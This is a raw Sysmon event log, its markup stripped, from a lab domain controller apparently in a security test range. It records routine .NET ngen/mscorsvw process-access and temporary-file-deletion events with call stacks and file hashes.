21:07:05.386{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7C05-00000000CF01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.386{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7C05-00000000CF01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.371{4DB9351A-A279-60D3-7B05-00000000CF01}6120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DAYYS7N999\Microsoft.Windows.DeviceHealthAttestation.Plugin.ni.dll.auxMD5=F75A26275DDE46A357563409477103B1,SHA256=92116001712896760DE8B8261D14CE473685F58369A395CB3C6F862784D0BFCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.371{4DB9351A-A279-60D3-7B05-00000000CF01}6120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DAYYS7N999\Microsoft.Windows.DeviceHealthAttestation.Plugin.ni.dllMD5=95AEB5B80B1C8AC01977ED1C89410BBE,SHA256=110CB8611BB5F58C2ABDAA9602BF318AD6051539DD56EB4F6F159664D564286C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.355{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7B05-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.339{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7B05-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.339{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7B05-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.339{4DB9351A-A279-60D3-7A05-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BHSDQZ8WLM\Microsoft.Windows.DeploymentServices.ServerManager.Plugin.ni.dll.auxMD5=F0E83D5041EDF1D2E2D8223163F2FEFA,SHA256=26E00CCC69BD5E488574FF0C3FC9BF0899E0D83A960C4F29708BC4D7BBDDDAB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.339{4DB9351A-A279-60D3-7A05-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BHSDQZ8WLM\Microsoft.Windows.DeploymentServices.ServerManager.Plugin.ni.dllMD5=3DEF485506E62A5CAF98FE4E69EB606F,SHA256=B4777C1887695BD6F0CD4037D77C9EEA66446B3433A7637DF00BCCDF6961611C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.308{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7A05-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.292{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7A05-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.292{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7A05-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.277{4DB9351A-A279-60D3-7905-00000000CF01}3252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UZPWIGEJ6E\Microsoft.VisualC.ni.dll.auxMD5=F6F6E9513E3939D0AF521B382FD70F87,SHA256=69A6468AAAF8DEA7FA96DE4C68EFC537E4068119CC493D4B0C8FB04524D27254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.277{4DB9351A-A279-60D3-7905-00000000CF01}3252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UZPWIGEJ6E\Microsoft.VisualC.ni.dllMD5=66BC80A509F113E18FEA92CB09D17651,SHA256=1C462FCB63021DA947DF5D05C926FCF8C7493752E0CF6D9F10C1360F4BEE22E1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.261{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7905-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.261{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7905-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.261{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7905-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.246{4DB9351A-A279-60D3-7805-00000000CF01}2196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\31VR3AGCMN\Microsoft.VisualBasic.Compatibility.Data.ni.dll.auxMD5=D7926BB9468A932E07C4BF42999AB93F,SHA256=56E2332F8C2A850BB22B465377B020CDD860B5412F890E76899719A9454DA3F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.246{4DB9351A-A279-60D3-7805-00000000CF01}2196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\31VR3AGCMN\Microsoft.VisualBasic.Compatibility.Data.ni.dllMD5=B2991FBE9A529D63D641C1551ECFF5D3,SHA256=E492D771BAB42884EFF71A7F5A4BDB210F7221D75F60238C1F295FBFC2237515,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.230{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7805-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.214{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7805-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.214{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7805-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.214{4DB9351A-A279-60D3-7705-00000000CF01}4116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U9Y12ANLF2\Microsoft.VisualBasic.Compatibility.ni.dll.auxMD5=6CDA167F01606CB575AABBF8D930A743,SHA256=321D6579B2A64F79BA6B5C63027BF8BDF7283E1C70E5EFF4D2810B0D8166EB49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.214{4DB9351A-A279-60D3-7705-00000000CF01}4116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U9Y12ANLF2\Microsoft.VisualBasic.Compatibility.ni.dllMD5=D24B04926FE7F6DCF22C03D19D81ACDA,SHA256=24BA745CC2F67BE16DCA1DA448D974A2B671607DB2813D4E1550F215C3A187F7,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.168{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7705-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.152{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7705-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.152{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7705-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.152{4DB9351A-A279-60D3-7605-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9PJC85LRRD\Microsoft.VisualBasic.Activities.Compiler.ni.dll.auxMD5=3A75FC6F030E23DB24076A596CC5E9D6,SHA256=5E3E94EAAAD36249B5E5CC704E75AE610874867ACC0211F1286A1538ABB83BCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.136{4DB9351A-A279-60D3-7605-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9PJC85LRRD\Microsoft.VisualBasic.Activities.Compiler.ni.dllMD5=8BC582094416D50CF506AEA4DAAE9FFB,SHA256=5A9AF3BAA544F0CB6223D31454ED4D07400CDF25A2CA283EDB31364D79382379,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 